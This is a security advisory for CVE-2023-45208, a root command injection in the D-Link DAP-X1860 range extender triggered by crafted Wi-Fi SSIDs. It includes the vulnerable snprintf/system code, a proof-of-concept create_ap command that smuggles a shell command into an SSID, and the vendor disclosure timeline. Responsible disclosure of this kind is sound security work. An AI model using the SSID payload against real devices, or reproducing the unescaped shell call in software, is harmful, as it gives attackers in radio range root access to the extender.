D-Link DAP-X1860: Remote Command Injection
The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.
Details
- Product: D-Link DAP-X1860
- Affected Versions: Tested on 1.00, 1.01b94,
DAP-X1860_fw_reva_101b05_01_ALL_multi_20230809
,DAPX1860A1_FW100B12_20231023_beta01
,DAPX1860A1_FW101B05_20231107_beta01
other versions may be affected, too - Fixed Versions:
DAP-X1860_RevA_Firmware_101b05-01_20240122
- Vulnerability Type: Command Injection
- Security Risk: medium
- Vendor URL:
https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender
- Vendor Status: fixed version released
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2023-006
- Advisory Status: published
- CVE: CVE-2023-45208
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208
Introduction
The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.
More Details
During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action “GetSiteSurvey”. If a Wi-Fi network with an apostrophe (such as Olaf’s Network) in its SSID is in range of the extender, the setup process will crash repeatedly with the following response from the server:
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 7 11b/g/n NONE In 17 YES NO
1 1 ***** **:**:**:**:**:** WPA2PSK/AES 24 11b/g/n NONE In 13 YES NO
2 1 ***** **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 13 YES NO
3 1 ***** **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES 81 11b/g/n NONE In 7 YES NO
4 1 ***** **:**:**:**:**:** WPA2PSKWPA3PSK/AES 63 11b/g/n/ax NONE In 19 YES NO
5 1 ***** **:**:**:**:**:** WPA2PSK/AES 44 11b/g/n/ax NONE In 5 NO NO
6 1 Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh
The output sh: 7: not found indicates that the extender attempted to execute some command and the apostrophe that was originally present in the Wi-Fi network Olaf’s Network is missing in the output. Additionally, the sixth line does not have the same alignment of spaces compared to the other lines.
This alone can be exploited as a denial-of-service-vulnerability as the setup process cannot be finished. However, it was also possible to execute arbitrary commands on the extender. For instance, it was attempted to inject the command uname -a which lists general kernel information. To do this, a Wi-Fi network within range was created with a SSID starting with a single quote and the command separated by the logical shell operator “&&”. The network was started using create_ap (https://github.com/oblique/create_ap):
$ create_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3
After rescanning for Wi-Fi networks on the range extender, this results in an HTTP 500 error code, including the output of the injected command:
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 0 11b/g/n NONE In 17 YES NO
1 1 Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: **:**:**:**:**:**: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
[...]
sh: 40: not
As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device including the injected commands run as the high-privileged root user.
The vulnerability originates from the parsing_xml_stasurvey function in libcgifunc.so, where a system command is executed containing the SSIDs from the Wi-Fi scan results without proper escaping:
[...]
snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info);
system(acStack_1a0);
[...]
Proof of Concept
Create a Wi-Fi network with an SSID containing a single quote, followed by some shell command separator, e.g. “&&” and the command to be run. In the following, create_ap (https://github.com/oblique/create_ap) was used to create the Wi-Fi network:
$ create_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3
To trigger the exploit, run the setup process of the range extender, or if it is already configured, run a network scan. The output of the command can be seen in HTTP responses of the extender’s web interface.
Security Risk
Attackers that are physically located in the Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender’s local network. While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender such that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.
Timeline
- 2023-05-06 Vulnerability identified
- 2023-05-08 Reported to
security@dlink.com
- 2023-06-19 After receiving no reply, a reminder was sent to
security@dlink.com
- 2023-07-21 After again receiving no reply, a D-Link security contact known from a previous disclosure was notified directly
- 2023-08-07 After again receiving no reply, another reminder sent to
security@dlink.com
- 2023-10-05 CVE ID requested
- 2023-10-05 CVE ID assigned
- 2023-10-09 Advisory released
- 2023-10-25 Hotfix patch
DAPX1860A1_FW100B12_20231023_beta01
released by vendor (https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10360) - 2023-11-16 RedTeam Pentesting contacted vendor via support chat as hotfix patch cannot be installed due to a wrong firmware format
- 2023-11-17 Vendor sent firmware (
DAPX1860A1_FW101B05_20231107_beta01
) with patch in correct format - 2023-11-23 RedTeam Pentesting confirmed that the vulnerability is still present and informed the vendor
- 2023-11-24 Vendor replied
- 2023-12-21 Vendor sent RedTeam Pentesting a new firmware
(
DAP-X1860_RevA_Firmware_101b05-01_20231219
) for confirmation - 2024-01-03 RedTeam Pentesting confirmed that the vulnerability is fixed
- 2024-01-03 Vendor released firmware
DAP-X1860_RevA_Firmware_101b05-01_20240122
on product website (https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender) - 2024-06-27 Corrected fixed version in advisory and changed version strings in advisory to be more precise
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/